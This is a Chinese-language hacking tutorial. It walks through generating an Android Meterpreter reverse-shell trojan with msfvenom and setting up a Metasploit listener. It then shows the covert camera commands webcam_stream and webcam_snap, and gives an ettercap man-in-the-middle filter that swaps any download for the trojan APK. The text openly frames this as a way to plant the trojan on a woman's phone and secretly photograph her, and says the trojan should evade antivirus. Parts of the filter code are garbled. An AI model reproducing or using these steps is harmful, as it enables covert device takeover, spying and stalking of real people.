首先我们要知道本机IP上几节课讲过Linux怎么查询IP 然后我们终端生成一个安卓木马在到终端输入命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5555 R > /root/apk.apk
以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfVENOM代替了,所以有些朋友在终端输入msfpayload的时候 会提示msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径 生成木马需要一些时间不会很长,我们在root目录下面生成了一个木马。
打开我们的MSF 命令是:msfconsole
然后我们加载模块
1. use exploit/multi/handler 加载模块 2. set payload android/meterpreter/reverse_tcp 选择Payload 3.show options 查看参数设置
我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置 1.set LHOST 192.168.1.109 这里的地址设置成我们刚才生成木马的IP地址 2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口 3.exploit 开始执行漏洞 开始监听
这里我用自己手机给大家演示大家可以利用ettercap进行欺骗偷换下载的文件实现木马种植别人手机
运行后获的shell
成功上线然后我们开始打开摄像头。 webcam_stream 开启摄像头 webcam_snap 隐秘拍照功能 -i 1 或者2是开启前置摄像头和后置摄像头的 总结一下如何成功的让妹子心甘情愿的安装你的木马。 ettercap准备进行中间人攻击首先新建一个规则 your website
if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!");
note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("keep-alive", "close" "); replace("Keep-Alive", "close" "); } if (ip.proto == TCP && search(DATA.data, ": application") ){
log(DECODED.data, "/tmp/log.log"); msg("found EXE\n");
first part of the exe example:
be run in MSDOS mode" you could search for MSDOS etc .. if (search(DATA.data, "Win32")) { msg("doing nothing\n"); } else { replace("200 OK", "301 Moved Permanently Location: http://www.xxx.com/apk.apk "); msg("redirect success\n"); } }
然后改掉里面的下载地址然后进行欺骗当妹纸不管下载什么东西的时候都会替换成我们的木马进行下载她运行后我们就可以获取权限了(当然木马首先得是免杀) 然后我们也可以查看妹子是什么系统来进行欺骗挂网马的方式来进行获取权限。 |